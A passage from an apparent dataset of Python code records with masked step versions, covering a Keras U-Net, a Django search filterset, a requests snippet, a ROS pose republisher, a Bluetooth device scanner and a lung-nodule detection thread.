"step-4": "from keras.models import *\nfrom keras.layers import *\nfrom keras.optimizers import *\nfrom keras.callbacks import ModelCheckpoint, LearningRateScheduler\nfrom keras import backend as keras\nunet_feature_n = 512\nunet_feature_nstep_size = 0.0001\nunet_input_image_size = 128\n\n\ndef unet(pretrained_weights=None, input_size=(unet_input_image_size,\n unet_input_image_size, 1)):\n inputs = Input(input_size)\n conv1 = Conv2D(unet_feature_n // 16, 3, activation='relu', padding=\n 'same', kernel_initializer='he_normal')(inputs)\n conv1 = Conv2D(unet_feature_n // 16, 3, activation='relu', padding=\n 'same', kernel_initializer='he_normal')(conv1)\n pool1 = MaxPooling2D(pool_size=(2, 2))(conv1)\n conv2 = Conv2D(unet_feature_n // 8, 3, activation='relu', padding=\n 'same', kernel_initializer='he_normal')(pool1)\n conv2 = Conv2D(unet_feature_n // 8, 3, activation='relu', padding=\n 'same', kernel_initializer='he_normal')(conv2)\n pool2 = MaxPooling2D(pool_size=(2, 2))(conv2)\n conv3 = Conv2D(unet_feature_n // 4, 3, activation='relu', padding=\n 'same', kernel_initializer='he_normal')(pool2)\n conv3 = Conv2D(unet_feature_n // 4, 3, activation='relu', padding=\n 'same', kernel_initializer='he_normal')(conv3)\n pool3 = MaxPooling2D(pool_size=(2, 2))(conv3)\n conv4 = Conv2D(unet_feature_n // 2, 3, activation='relu', padding=\n 'same', kernel_initializer='he_normal')(pool3)\n conv4 = Conv2D(unet_feature_n // 2, 3, activation='relu', padding=\n 'same', kernel_initializer='he_normal')(conv4)\n drop4 = Dropout(0.5)(conv4)\n pool4 = MaxPooling2D(pool_size=(2, 2))(drop4)\n conv5 = Conv2D(unet_feature_n, 3, activation='relu', padding='same',\n kernel_initializer='he_normal')(pool4)\n conv5 = Conv2D(unet_feature_n, 3, activation='relu', padding='same',\n kernel_initializer='he_normal')(conv5)\n drop5 = Dropout(0.5)(conv5)\n up6 = Conv2D(unet_feature_n // 2, 2, activation='relu', padding='same',\n kernel_initializer='he_normal')(UpSampling2D(size=(2, 2))(drop5))\n merge6 = concatenate([drop4, up6], axis=3)\n conv6 = Conv2D(unet_feature_n // 2, 3, activation='relu', padding=\n 'same', kernel_initializer='he_normal')(merge6)\n conv6 = Conv2D(unet_feature_n // 2, 3, activation='relu', padding=\n 'same', kernel_initializer='he_normal')(conv6)\n up7 = Conv2D(unet_feature_n // 4, 2, activation='relu', padding='same',\n kernel_initializer='he_normal')(UpSampling2D(size=(2, 2))(conv6))\n merge7 = concatenate([conv3, up7], axis=3)\n conv7 = Conv2D(unet_feature_n // 4, 3, activation='relu', padding=\n 'same', kernel_initializer='he_normal')(merge7)\n conv7 = Conv2D(unet_feature_n // 4, 3, activation='relu', padding=\n 'same', kernel_initializer='he_normal')(conv7)\n up8 = Conv2D(unet_feature_n // 8, 2, activation='relu', padding='same',\n kernel_initializer='he_normal')(UpSampling2D(size=(2, 2))(conv7))\n merge8 = concatenate([conv2, up8], axis=3)\n conv8 = Conv2D(unet_feature_n // 8, 3, activation='relu', padding=\n 'same', kernel_initializer='he_normal')(merge8)\n conv8 = Conv2D(unet_feature_n // 8, 3, activation='relu', padding=\n 'same', kernel_initializer='he_normal')(conv8)\n up9 = Conv2D(unet_feature_n // 16, 2, activation='relu', padding='same',\n kernel_initializer='he_normal')(UpSampling2D(size=(2, 2))(conv8))\n merge9 = concatenate([conv1, up9], axis=3)\n conv9 = Conv2D(unet_feature_n // 16, 3, activation='relu', padding=\n 'same', kernel_initializer='he_normal')(merge9)\n conv9 = Conv2D(unet_feature_n // 16, 3, activation='relu', padding=\n 'same', kernel_initializer='he_normal')(conv9)\n conv9 = 
Conv2D(2, 3, activation='relu', padding='same',\n kernel_initializer='he_normal')(conv9)\n conv10 = Conv2D(1, 1, activation='sigmoid')(conv9)\n model = Model(inputs=inputs, outputs=conv10)\n model.compile(optimizer=Adam(lr=unet_feature_nstep_size), loss=\n 'binary_crossentropy', metrics=['accuracy'])\n if pretrained_weights:\n model.load_weights(pretrained_weights)\n return model\n\n\ndef small_unet(pretrained_weights=False, patch_size=128):\n input_ = Input((patch_size, patch_size, 1))\n skips = []\n output = input_\n for shape, filters in zip([5, 3, 3, 3, 3, 3, 3], [16, 32, 64, 64, 64, \n 64, 64]):\n skips.append(output)\n print(output.shape)\n output = Conv2D(filters, (shape, shape), strides=2, padding='same',\n activation='relu')(output)\n for shape, filters in zip([4, 4, 4, 4, 4, 4, 4, 4], [64, 64, 64, 64, 32,\n 16, 2]):\n output = UpSampling2D()(output)\n skip_output = skips.pop()\n output = concatenate([output, skip_output], axis=3)\n if filters != 2:\n activation = 'relu'\n else:\n activation = 'softmax'\n output = Conv2D(filters if filters != 2 else 2, (shape, shape),\n activation=activation, padding='same')(output)\n if filters != 2:\n output = BatchNormalization(momentum=0.9)(output)\n assert len(skips) == 0\n m = Model([input_], [output])\n if pretrained_weights:\n m.load_weights(pretrained_weights)\n m.compile(optimizer=Adam(), loss='binary_crossentropy', metrics=[\n 'accuracy'])\n return m\n",
"step-5": "from keras.models import *\nfrom keras.layers import *\nfrom keras.optimizers import *\nfrom keras.callbacks import ModelCheckpoint, LearningRateScheduler\nfrom keras import backend as keras\n\nunet_feature_n = 512\nunet_feature_nstep_size = 1e-4\nunet_input_image_size = 128\n\ndef unet(pretrained_weights=None, input_size=(unet_input_image_size, unet_input_image_size, 1)):\n inputs = Input(input_size)\n conv1 = Conv2D(unet_feature_n // 16, 3, activation='relu', padding='same', kernel_initializer='he_normal')(inputs)\n conv1 = Conv2D(unet_feature_n // 16, 3, activation='relu', padding='same', kernel_initializer='he_normal')(conv1)\n pool1 = MaxPooling2D(pool_size=(2, 2))(conv1)\n conv2 = Conv2D(unet_feature_n // 8, 3, activation='relu', padding='same', kernel_initializer='he_normal')(pool1)\n conv2 = Conv2D(unet_feature_n // 8, 3, activation='relu', padding='same', kernel_initializer='he_normal')(conv2)\n pool2 = MaxPooling2D(pool_size=(2, 2))(conv2)\n conv3 = Conv2D(unet_feature_n // 4, 3, activation='relu', padding='same', kernel_initializer='he_normal')(pool2)\n conv3 = Conv2D(unet_feature_n // 4, 3, activation='relu', padding='same', kernel_initializer='he_normal')(conv3)\n pool3 = MaxPooling2D(pool_size=(2, 2))(conv3)\n conv4 = Conv2D(unet_feature_n // 2, 3, activation='relu', padding='same', kernel_initializer='he_normal')(pool3)\n conv4 = Conv2D(unet_feature_n // 2, 3, activation='relu', padding='same', kernel_initializer='he_normal')(conv4)\n drop4 = Dropout(0.5)(conv4)\n pool4 = MaxPooling2D(pool_size=(2, 2))(drop4)\n\n conv5 = Conv2D(unet_feature_n, 3, activation='relu', padding='same', kernel_initializer='he_normal')(pool4)\n conv5 = Conv2D(unet_feature_n, 3, activation='relu', padding='same', kernel_initializer='he_normal')(conv5)\n drop5 = Dropout(0.5)(conv5)\n\n up6 = Conv2D(unet_feature_n // 2, 2, activation='relu', padding='same', kernel_initializer='he_normal')(\n UpSampling2D(size=(2, 2))(drop5))\n merge6 = concatenate([drop4, up6], axis=3)\n conv6 = Conv2D(unet_feature_n // 2, 3, activation='relu', padding='same', kernel_initializer='he_normal')(merge6)\n conv6 = Conv2D(unet_feature_n // 2, 3, activation='relu', padding='same', kernel_initializer='he_normal')(conv6)\n\n up7 = Conv2D(unet_feature_n // 4, 2, activation='relu', padding='same', kernel_initializer='he_normal')(\n UpSampling2D(size=(2, 2))(conv6))\n merge7 = concatenate([conv3, up7], axis=3)\n conv7 = Conv2D(unet_feature_n // 4, 3, activation='relu', padding='same', kernel_initializer='he_normal')(merge7)\n conv7 = Conv2D(unet_feature_n // 4, 3, activation='relu', padding='same', kernel_initializer='he_normal')(conv7)\n\n up8 = Conv2D(unet_feature_n // 8, 2, activation='relu', padding='same', kernel_initializer='he_normal')(\n UpSampling2D(size=(2, 2))(conv7))\n merge8 = concatenate([conv2, up8], axis=3)\n conv8 = Conv2D(unet_feature_n // 8, 3, activation='relu', padding='same', kernel_initializer='he_normal')(merge8)\n conv8 = Conv2D(unet_feature_n // 8, 3, activation='relu', padding='same', kernel_initializer='he_normal')(conv8)\n\n up9 = Conv2D(unet_feature_n // 16, 2, activation='relu', padding='same', kernel_initializer='he_normal')(\n UpSampling2D(size=(2, 2))(conv8))\n merge9 = concatenate([conv1, up9], axis=3)\n conv9 = Conv2D(unet_feature_n // 16, 3, activation='relu', padding='same', kernel_initializer='he_normal')(merge9)\n conv9 = Conv2D(unet_feature_n // 16, 3, activation='relu', padding='same', kernel_initializer='he_normal')(conv9)\n conv9 = Conv2D(2, 3, activation='relu', 
padding='same', kernel_initializer='he_normal')(conv9)\n conv10 = Conv2D(1, 1, activation='sigmoid')(conv9)\n\n model = Model(inputs=inputs, outputs=conv10)\n\n model.compile(optimizer=Adam(lr=unet_feature_nstep_size), loss='binary_crossentropy', metrics=['accuracy'])\n\n if (pretrained_weights):\n model.load_weights(pretrained_weights)\n\n return model\n\n\ndef small_unet(pretrained_weights=False, patch_size=128):\n input_ = Input((patch_size, patch_size, 1))\n skips = []\n output = input_\n for shape, filters in zip([5, 3, 3, 3, 3, 3, 3], [16, 32, 64, 64, 64, 64, 64]):\n skips.append(output)\n print(output.shape)\n output= Conv2D(filters, (shape, shape), strides=2, padding=\"same\", activation=\"relu\")(output)\n #output = BatchNormalization()(output)\n #if shape != 7:\n # output = BatchNormalization()(output)\n for shape, filters in zip([4, 4, 4, 4, 4, 4, 4, 4], [64, 64, 64, 64,32, 16, 2]):\n output = UpSampling2D()(output)\n\n skip_output = skips.pop()\n output = concatenate([output, skip_output], axis=3)\n\n if filters != 2:\n activation = \"relu\"\n else:\n activation = \"softmax\"\n output = Conv2D(filters if filters != 2 else 2, (shape, shape), activation=activation, padding=\"same\")(output)\n \n if filters != 2:\n output = BatchNormalization(momentum=.9)(output)\n assert len(skips) == 0\n m = Model([input_], [output])\n\n if pretrained_weights:\n m.load_weights(pretrained_weights)\n\n m.compile(optimizer=Adam(), loss='binary_crossentropy', metrics=['accuracy'])\n return m",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
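A quick sanity check for the builders in the record above is to push a random patch through the compiled model and look at the output shape. The batch of dummy data below is arbitrary, and this assumes a Keras/TensorFlow version that still accepts the API used above (e.g. Adam(lr=...) in unet()):

import numpy as np

model = small_unet(pretrained_weights=False, patch_size=128)
x = np.random.rand(2, 128, 128, 1).astype("float32")  # two dummy grayscale patches
pred = model.predict(x)
print(pred.shape)  # expected (2, 128, 128, 2): a two-channel softmax map per patch

The unet() builder can be smoke-tested the same way; it takes the same (128, 128, 1) input but ends in a single-channel sigmoid output.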
from django import forms
from django.utils.translation import gettext_lazy as _
import django_filters
from elasticsearch_dsl.query import Q
class BaseSearchFilterSet(django_filters.FilterSet):
query_fields = ["content"]
q = django_filters.CharFilter(
method="auto_query",
widget=forms.TextInput(
attrs={"placeholder": _("Enter search term"), "class": "form-control"}
),
)
def __init__(self, *args, **kwargs):
self.facet_config = kwargs.pop("facet_config", {})
self.view = kwargs.pop("view", None)
super().__init__(*args, **kwargs)
def apply_filter(self, qs, name, *args, **kwargs):
if name in self.facet_config:
return qs.post_filter(name, *args, **kwargs)
return qs.filter(*args, **kwargs)
def filter_queryset(self, queryset):
"""
Filter the queryset with the underlying form's `cleaned_data`. You must
call `is_valid()` or `errors` before calling this method.
This method should be overridden if additional filtering needs to be
applied to the queryset before it is cached.
"""
for name, value in self.form.cleaned_data.items():
queryset = self.filters[name].filter(queryset, value)
# assert isinstance(queryset, models.QuerySet), \
# "Expected '%s.%s' to return a QuerySet, but got a %s instead." \
# % (type(self).__name__, name, type(queryset).__name__)
return queryset
def auto_query(self, qs, name, value):
if value:
return qs.set_query(
Q(
"simple_query_string",
query=value,
fields=self.query_fields,
default_operator="and",
lenient=True,
)
)
return qs
|
normal
|
{
"blob_id": "f225fbf363f1b170704418ed339f2e57ca790975",
"index": 5317,
"step-1": "<mask token>\n\n\nclass BaseSearchFilterSet(django_filters.FilterSet):\n <mask token>\n <mask token>\n\n def __init__(self, *args, **kwargs):\n self.facet_config = kwargs.pop('facet_config', {})\n self.view = kwargs.pop('view', None)\n super().__init__(*args, **kwargs)\n\n def apply_filter(self, qs, name, *args, **kwargs):\n if name in self.facet_config:\n return qs.post_filter(name, *args, **kwargs)\n return qs.filter(*args, **kwargs)\n <mask token>\n\n def auto_query(self, qs, name, value):\n if value:\n return qs.set_query(Q('simple_query_string', query=value,\n fields=self.query_fields, default_operator='and', lenient=True)\n )\n return qs\n",
"step-2": "<mask token>\n\n\nclass BaseSearchFilterSet(django_filters.FilterSet):\n <mask token>\n <mask token>\n\n def __init__(self, *args, **kwargs):\n self.facet_config = kwargs.pop('facet_config', {})\n self.view = kwargs.pop('view', None)\n super().__init__(*args, **kwargs)\n\n def apply_filter(self, qs, name, *args, **kwargs):\n if name in self.facet_config:\n return qs.post_filter(name, *args, **kwargs)\n return qs.filter(*args, **kwargs)\n\n def filter_queryset(self, queryset):\n \"\"\"\n Filter the queryset with the underlying form's `cleaned_data`. You must\n call `is_valid()` or `errors` before calling this method.\n This method should be overridden if additional filtering needs to be\n applied to the queryset before it is cached.\n \"\"\"\n for name, value in self.form.cleaned_data.items():\n queryset = self.filters[name].filter(queryset, value)\n return queryset\n\n def auto_query(self, qs, name, value):\n if value:\n return qs.set_query(Q('simple_query_string', query=value,\n fields=self.query_fields, default_operator='and', lenient=True)\n )\n return qs\n",
"step-3": "<mask token>\n\n\nclass BaseSearchFilterSet(django_filters.FilterSet):\n query_fields = ['content']\n q = django_filters.CharFilter(method='auto_query', widget=forms.\n TextInput(attrs={'placeholder': _('Enter search term'), 'class':\n 'form-control'}))\n\n def __init__(self, *args, **kwargs):\n self.facet_config = kwargs.pop('facet_config', {})\n self.view = kwargs.pop('view', None)\n super().__init__(*args, **kwargs)\n\n def apply_filter(self, qs, name, *args, **kwargs):\n if name in self.facet_config:\n return qs.post_filter(name, *args, **kwargs)\n return qs.filter(*args, **kwargs)\n\n def filter_queryset(self, queryset):\n \"\"\"\n Filter the queryset with the underlying form's `cleaned_data`. You must\n call `is_valid()` or `errors` before calling this method.\n This method should be overridden if additional filtering needs to be\n applied to the queryset before it is cached.\n \"\"\"\n for name, value in self.form.cleaned_data.items():\n queryset = self.filters[name].filter(queryset, value)\n return queryset\n\n def auto_query(self, qs, name, value):\n if value:\n return qs.set_query(Q('simple_query_string', query=value,\n fields=self.query_fields, default_operator='and', lenient=True)\n )\n return qs\n",
"step-4": "from django import forms\nfrom django.utils.translation import gettext_lazy as _\nimport django_filters\nfrom elasticsearch_dsl.query import Q\n\n\nclass BaseSearchFilterSet(django_filters.FilterSet):\n query_fields = ['content']\n q = django_filters.CharFilter(method='auto_query', widget=forms.\n TextInput(attrs={'placeholder': _('Enter search term'), 'class':\n 'form-control'}))\n\n def __init__(self, *args, **kwargs):\n self.facet_config = kwargs.pop('facet_config', {})\n self.view = kwargs.pop('view', None)\n super().__init__(*args, **kwargs)\n\n def apply_filter(self, qs, name, *args, **kwargs):\n if name in self.facet_config:\n return qs.post_filter(name, *args, **kwargs)\n return qs.filter(*args, **kwargs)\n\n def filter_queryset(self, queryset):\n \"\"\"\n Filter the queryset with the underlying form's `cleaned_data`. You must\n call `is_valid()` or `errors` before calling this method.\n This method should be overridden if additional filtering needs to be\n applied to the queryset before it is cached.\n \"\"\"\n for name, value in self.form.cleaned_data.items():\n queryset = self.filters[name].filter(queryset, value)\n return queryset\n\n def auto_query(self, qs, name, value):\n if value:\n return qs.set_query(Q('simple_query_string', query=value,\n fields=self.query_fields, default_operator='and', lenient=True)\n )\n return qs\n",
"step-5": "from django import forms\nfrom django.utils.translation import gettext_lazy as _\n\nimport django_filters\nfrom elasticsearch_dsl.query import Q\n\n\nclass BaseSearchFilterSet(django_filters.FilterSet):\n query_fields = [\"content\"]\n\n q = django_filters.CharFilter(\n method=\"auto_query\",\n widget=forms.TextInput(\n attrs={\"placeholder\": _(\"Enter search term\"), \"class\": \"form-control\"}\n ),\n )\n\n def __init__(self, *args, **kwargs):\n self.facet_config = kwargs.pop(\"facet_config\", {})\n self.view = kwargs.pop(\"view\", None)\n super().__init__(*args, **kwargs)\n\n def apply_filter(self, qs, name, *args, **kwargs):\n if name in self.facet_config:\n return qs.post_filter(name, *args, **kwargs)\n return qs.filter(*args, **kwargs)\n\n def filter_queryset(self, queryset):\n \"\"\"\n Filter the queryset with the underlying form's `cleaned_data`. You must\n call `is_valid()` or `errors` before calling this method.\n This method should be overridden if additional filtering needs to be\n applied to the queryset before it is cached.\n \"\"\"\n for name, value in self.form.cleaned_data.items():\n queryset = self.filters[name].filter(queryset, value)\n # assert isinstance(queryset, models.QuerySet), \\\n # \"Expected '%s.%s' to return a QuerySet, but got a %s instead.\" \\\n # % (type(self).__name__, name, type(queryset).__name__)\n return queryset\n\n def auto_query(self, qs, name, value):\n if value:\n return qs.set_query(\n Q(\n \"simple_query_string\",\n query=value,\n fields=self.query_fields,\n default_operator=\"and\",\n lenient=True,\n )\n )\n return qs\n",
"step-ids": [
4,
5,
6,
7,
8
]
}
|
[
4,
5,
6,
7,
8
] |
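BaseSearchFilterSet in the record above is meant to be subclassed: apply_filter() routes any field listed in facet_config through post_filter() (so facet counts are computed before that filter is applied) and everything else through a plain filter(). A hypothetical subclass sketch - the tags field, its term query and the facet_config value are assumptions, and qs is whatever search wrapper the base class already receives - could look like:

import django_filters


class DocumentSearchFilterSet(BaseSearchFilterSet):
    # BaseSearchFilterSet is the class defined in the record above
    query_fields = ["title", "content"]

    tags = django_filters.CharFilter(method="filter_tags")

    def filter_tags(self, qs, name, value):
        if not value:
            return qs
        # goes through post_filter() when "tags" appears in facet_config,
        # otherwise through a normal filter()
        return self.apply_filter(qs, "tags", "term", tags=value)


# fs = DocumentSearchFilterSet(request.GET, queryset=search,
#                              facet_config={"tags": {}}, view=None)

The commented-out construction at the end shows the extra facet_config / view keyword arguments that __init__() pops off before handing the rest to django-filter.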
import requests

# try to make the request
try:
    r = requests.get('http://skitter.com')
    print(r)  # see the results
# catch a failure
except (requests.ConnectionError, requests.Timeout) as x:
    pass
|
normal
|
{
"blob_id": "a26cab29f0777764f014eeff13745be60e55b62d",
"index": 724,
"step-1": "<mask token>\n",
"step-2": "<mask token>\ntry:\n r = requests.get('http://skitter.com')\n print(r)\nexcept (requests.ConnectionError, requests.Timeout) as x:\n pass\n",
"step-3": "import requests\ntry:\n r = requests.get('http://skitter.com')\n print(r)\nexcept (requests.ConnectionError, requests.Timeout) as x:\n pass\n",
"step-4": "import requests\n\n#try make the request\ntry:\n\tr = requests.get('http://skitter.com')\n\tprint(r)\t# see the results\n\n# catch a failue\nexcept (requests.ConnectionError, requests.Timeout) as x:\n\tpass",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
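One detail worth noting about the record above: requests.get() is called without a timeout argument, so the requests.Timeout branch of the except clause can effectively never fire from that call. A variant where it can:

import requests

try:
    r = requests.get('http://skitter.com', timeout=5)  # seconds; raises requests.Timeout when exceeded
    print(r)
except (requests.ConnectionError, requests.Timeout) as x:
    print('request failed:', x)

Connection errors are still caught the same way; only the timeout behaviour changes.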
#!/usr/bin/env python
import rospy
import cv2
from geometry_msgs.msg import PoseStamped
class PositionReader:
def __init__(self):
self.image_sub = rospy.Subscriber(
"/visp_auto_tracker/object_position", PoseStamped, self.callback)
self.pub = rospy.Publisher('object_position', PoseStamped, queue_size=10)
rospy.init_node('PositionReader', anonymous=False)
self.data = PoseStamped()
def callback(self, data):
if(self.data.pose.position.x != data.pose.position.x):
self.pub.publish(data)
print(data)
self.data = data
if __name__ == '__main__':
try:
PositionReader()
rospy.spin()
except rospy.ROSInterruptException:
cv2.destroyAllWindows()
pass
|
normal
|
{
"blob_id": "26ac0c94d0ab70d90854ca2c913ef0f633b54a3c",
"index": 4527,
"step-1": "<mask token>\n\n\nclass PositionReader:\n\n def __init__(self):\n self.image_sub = rospy.Subscriber('/visp_auto_tracker/object_position',\n PoseStamped, self.callback)\n self.pub = rospy.Publisher('object_position', PoseStamped,\n queue_size=10)\n rospy.init_node('PositionReader', anonymous=False)\n self.data = PoseStamped()\n <mask token>\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass PositionReader:\n\n def __init__(self):\n self.image_sub = rospy.Subscriber('/visp_auto_tracker/object_position',\n PoseStamped, self.callback)\n self.pub = rospy.Publisher('object_position', PoseStamped,\n queue_size=10)\n rospy.init_node('PositionReader', anonymous=False)\n self.data = PoseStamped()\n\n def callback(self, data):\n if self.data.pose.position.x != data.pose.position.x:\n self.pub.publish(data)\n print(data)\n self.data = data\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass PositionReader:\n\n def __init__(self):\n self.image_sub = rospy.Subscriber('/visp_auto_tracker/object_position',\n PoseStamped, self.callback)\n self.pub = rospy.Publisher('object_position', PoseStamped,\n queue_size=10)\n rospy.init_node('PositionReader', anonymous=False)\n self.data = PoseStamped()\n\n def callback(self, data):\n if self.data.pose.position.x != data.pose.position.x:\n self.pub.publish(data)\n print(data)\n self.data = data\n\n\nif __name__ == '__main__':\n try:\n PositionReader()\n rospy.spin()\n except rospy.ROSInterruptException:\n cv2.destroyAllWindows()\n pass\n",
"step-4": "import rospy\nimport cv2\nfrom geometry_msgs.msg import PoseStamped\n\n\nclass PositionReader:\n\n def __init__(self):\n self.image_sub = rospy.Subscriber('/visp_auto_tracker/object_position',\n PoseStamped, self.callback)\n self.pub = rospy.Publisher('object_position', PoseStamped,\n queue_size=10)\n rospy.init_node('PositionReader', anonymous=False)\n self.data = PoseStamped()\n\n def callback(self, data):\n if self.data.pose.position.x != data.pose.position.x:\n self.pub.publish(data)\n print(data)\n self.data = data\n\n\nif __name__ == '__main__':\n try:\n PositionReader()\n rospy.spin()\n except rospy.ROSInterruptException:\n cv2.destroyAllWindows()\n pass\n",
"step-5": "#!/usr/bin/env python\n\nimport rospy\nimport cv2\nfrom geometry_msgs.msg import PoseStamped\n\n\nclass PositionReader:\n\n def __init__(self):\n self.image_sub = rospy.Subscriber(\n \"/visp_auto_tracker/object_position\", PoseStamped, self.callback)\n self.pub = rospy.Publisher('object_position', PoseStamped, queue_size=10)\n rospy.init_node('PositionReader', anonymous=False)\n self.data = PoseStamped()\n\n def callback(self, data):\n if(self.data.pose.position.x != data.pose.position.x):\n self.pub.publish(data)\n print(data)\n self.data = data\n\nif __name__ == '__main__':\n try:\n PositionReader()\n rospy.spin()\n except rospy.ROSInterruptException:\n cv2.destroyAllWindows()\n pass\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
#!/usr/bin/env python3
import gatt
class AnyDevice(gatt.Device):
def connect_succeeded(self):
super().connect_succeeded()
print("[%s] Connected" % (self.mac_address))
def connect_failed(self, error):
super().connect_failed(error)
print("[%s] Connection failed: %s" % (self.mac_address, str(error)))
def disconnect_succeeded(self):
super().disconnect_succeeded()
print("[%s] Disconnected" % (self.mac_address))
def services_resolved(self):
super().services_resolved()
print("[%s] Resolved services" % (self.mac_address))
for service in self.services:
print("[%s] Service [%s]" % (self.mac_address, service.uuid))
for characteristic in service.characteristics:
print("[%s] Characteristic [%s]" % (self.mac_address, characteristic.uuid))
print(dir(characteristic))
print("*****")
class AnyDeviceManager(gatt.DeviceManager):
def __init__(self, adapter_name, mac_list):
super().__init__(adapter_name)
self.mac_list = mac_list
def device_discovered(self, device):
#print("Discovered [%s] %s" % (device.mac_address, device.alias()))
if ('powertap' in device.alias() and 'L' in device.alias()):
print(device.mac_address)
manager.stop()
manager = AnyDeviceManager(adapter_name='hci0',mac_list=[])
manager.start_discovery()
manager.run()
#74:5c:4b:0b:4e:f2
#device = AnyDevice(mac_address='66:12:d1:56:6b:3c', manager=manager)
|
normal
|
{
"blob_id": "480e636cfe28f2509d8ecf1e6e89924e994f100d",
"index": 4888,
"step-1": "<mask token>\n\n\nclass AnyDevice(gatt.Device):\n <mask token>\n\n def connect_failed(self, error):\n super().connect_failed(error)\n print('[%s] Connection failed: %s' % (self.mac_address, str(error)))\n <mask token>\n <mask token>\n\n\nclass AnyDeviceManager(gatt.DeviceManager):\n\n def __init__(self, adapter_name, mac_list):\n super().__init__(adapter_name)\n self.mac_list = mac_list\n\n def device_discovered(self, device):\n if 'powertap' in device.alias() and 'L' in device.alias():\n print(device.mac_address)\n manager.stop()\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass AnyDevice(gatt.Device):\n\n def connect_succeeded(self):\n super().connect_succeeded()\n print('[%s] Connected' % self.mac_address)\n\n def connect_failed(self, error):\n super().connect_failed(error)\n print('[%s] Connection failed: %s' % (self.mac_address, str(error)))\n\n def disconnect_succeeded(self):\n super().disconnect_succeeded()\n print('[%s] Disconnected' % self.mac_address)\n <mask token>\n\n\nclass AnyDeviceManager(gatt.DeviceManager):\n\n def __init__(self, adapter_name, mac_list):\n super().__init__(adapter_name)\n self.mac_list = mac_list\n\n def device_discovered(self, device):\n if 'powertap' in device.alias() and 'L' in device.alias():\n print(device.mac_address)\n manager.stop()\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass AnyDevice(gatt.Device):\n\n def connect_succeeded(self):\n super().connect_succeeded()\n print('[%s] Connected' % self.mac_address)\n\n def connect_failed(self, error):\n super().connect_failed(error)\n print('[%s] Connection failed: %s' % (self.mac_address, str(error)))\n\n def disconnect_succeeded(self):\n super().disconnect_succeeded()\n print('[%s] Disconnected' % self.mac_address)\n\n def services_resolved(self):\n super().services_resolved()\n print('[%s] Resolved services' % self.mac_address)\n for service in self.services:\n print('[%s] Service [%s]' % (self.mac_address, service.uuid))\n for characteristic in service.characteristics:\n print('[%s] Characteristic [%s]' % (self.mac_address,\n characteristic.uuid))\n print(dir(characteristic))\n print('*****')\n\n\nclass AnyDeviceManager(gatt.DeviceManager):\n\n def __init__(self, adapter_name, mac_list):\n super().__init__(adapter_name)\n self.mac_list = mac_list\n\n def device_discovered(self, device):\n if 'powertap' in device.alias() and 'L' in device.alias():\n print(device.mac_address)\n manager.stop()\n\n\n<mask token>\nmanager.start_discovery()\nmanager.run()\n",
"step-4": "import gatt\n\n\nclass AnyDevice(gatt.Device):\n\n def connect_succeeded(self):\n super().connect_succeeded()\n print('[%s] Connected' % self.mac_address)\n\n def connect_failed(self, error):\n super().connect_failed(error)\n print('[%s] Connection failed: %s' % (self.mac_address, str(error)))\n\n def disconnect_succeeded(self):\n super().disconnect_succeeded()\n print('[%s] Disconnected' % self.mac_address)\n\n def services_resolved(self):\n super().services_resolved()\n print('[%s] Resolved services' % self.mac_address)\n for service in self.services:\n print('[%s] Service [%s]' % (self.mac_address, service.uuid))\n for characteristic in service.characteristics:\n print('[%s] Characteristic [%s]' % (self.mac_address,\n characteristic.uuid))\n print(dir(characteristic))\n print('*****')\n\n\nclass AnyDeviceManager(gatt.DeviceManager):\n\n def __init__(self, adapter_name, mac_list):\n super().__init__(adapter_name)\n self.mac_list = mac_list\n\n def device_discovered(self, device):\n if 'powertap' in device.alias() and 'L' in device.alias():\n print(device.mac_address)\n manager.stop()\n\n\nmanager = AnyDeviceManager(adapter_name='hci0', mac_list=[])\nmanager.start_discovery()\nmanager.run()\n",
"step-5": "#!/usr/bin/env python3\nimport gatt\n\nclass AnyDevice(gatt.Device):\n def connect_succeeded(self):\n super().connect_succeeded()\n print(\"[%s] Connected\" % (self.mac_address))\n\n def connect_failed(self, error):\n super().connect_failed(error)\n print(\"[%s] Connection failed: %s\" % (self.mac_address, str(error)))\n\n def disconnect_succeeded(self):\n super().disconnect_succeeded()\n print(\"[%s] Disconnected\" % (self.mac_address))\n\n def services_resolved(self):\n super().services_resolved()\n\n print(\"[%s] Resolved services\" % (self.mac_address))\n for service in self.services:\n print(\"[%s] Service [%s]\" % (self.mac_address, service.uuid))\n for characteristic in service.characteristics:\n print(\"[%s] Characteristic [%s]\" % (self.mac_address, characteristic.uuid))\n print(dir(characteristic))\n print(\"*****\")\n\n\nclass AnyDeviceManager(gatt.DeviceManager):\n def __init__(self, adapter_name, mac_list):\n super().__init__(adapter_name)\n self.mac_list = mac_list\n\n def device_discovered(self, device):\n #print(\"Discovered [%s] %s\" % (device.mac_address, device.alias()))\n if ('powertap' in device.alias() and 'L' in device.alias()):\n print(device.mac_address)\n manager.stop()\n \nmanager = AnyDeviceManager(adapter_name='hci0',mac_list=[])\nmanager.start_discovery()\nmanager.run()\n\n\n#74:5c:4b:0b:4e:f2\n\n\n#device = AnyDevice(mac_address='66:12:d1:56:6b:3c', manager=manager)\n\n",
"step-ids": [
5,
7,
9,
11,
12
]
}
|
[
5,
7,
9,
11,
12
] |
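The commented-out lines at the end of the record above hint at the follow-up step: once the scan has printed the sensor's MAC address, a later run can connect to that address directly instead of re-discovering. Under the usual gatt-python flow (the MAC below is just the one mentioned in the record's own comment) that looks roughly like:

import gatt

manager = gatt.DeviceManager(adapter_name='hci0')
device = AnyDevice(mac_address='74:5c:4b:0b:4e:f2', manager=manager)
device.connect()   # connect_succeeded() / services_resolved() fire asynchronously
manager.run()      # blocks and drives the event loop

run() blocks, so connect() has to be issued before it, exactly as the scan in the record does with start_discovery().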
import threading
import time
# import numpy as np
import pickle
from utils.ret_utils import error_info
from nodule_class.isnodule import LungIsncls
from preprocessing.location import lobe_locate_gmm
from detection.lung_detection import LungDetection
from func_timeout import FunctionTimedOut
from func_timeout import func_set_timeout
import weakref
class GpuThread(threading.Thread):
def __init__(self, que_det, que_ret, index):
threading.Thread.__init__(self)
self.que_det = que_det
self.que_ret = que_ret
self.index = index
self.lung_dete = LungDetection("./model/det.ckpt", self.index)
# is nodule cls
self.lung_isnc = LungIsncls("./model/isn.ckpt", self.index)
